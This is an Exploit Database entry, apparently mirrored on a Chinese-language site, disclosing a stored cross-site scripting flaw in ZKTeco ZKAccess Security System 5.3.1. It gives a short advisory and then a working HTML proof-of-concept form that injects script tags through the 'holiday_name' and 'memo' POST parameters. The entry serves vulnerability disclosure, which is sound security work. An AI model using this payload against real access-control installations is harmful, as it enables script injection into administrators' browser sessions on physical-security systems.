ZKTeco ZKAccess Security System 5.3.1 – Persistent Cross-Site Scripting

• Exploit Database
• 35 阅读

• 作者： LiquidWorm
  日期： 2016-08-31
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/40328/

• <!--
  
  ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
  
  
  Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
  Product web page: http://www.zkteco.com
  Affected version: 5.3.12252
  
  Summary: ZKAccess Systems are built on flexible, open technology to provide
  management, real-time monitoring, and control of your access control system-all
  from a browser, with no additional software to install. Our secure Web-hosted
  infrastructure and centralized online administration reduce your IT costs and
  allow you to easily manage all of your access points in a single location. C3-100's
  versatile design features take care of present and future needs with ease and
  efficiency. It is one of the most rugged and reliable controllers on the market,
  with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
  via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
  cardholders.
  
  Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
  sanitised before being returned to the user. This can be exploited to execute
  arbitrary HTML and script code in a user's browser session in context of an affected
  site.
  
  Tested on: CherryPy/3.1.0beta3 WSGI Server
   Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
   Python 2.6
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5368
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
  
  
  18.07.2016
  
  -->
  
  
  <html>
  <body>
  <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
  <input type="hidden" name="pk" value="None" />
  <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
  <input type="hidden" name="holiday&#95;type" value="1" />
  <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
  <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
  <input type="hidden" name="loop&#95;by&#95;year" value="2" />
  <input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>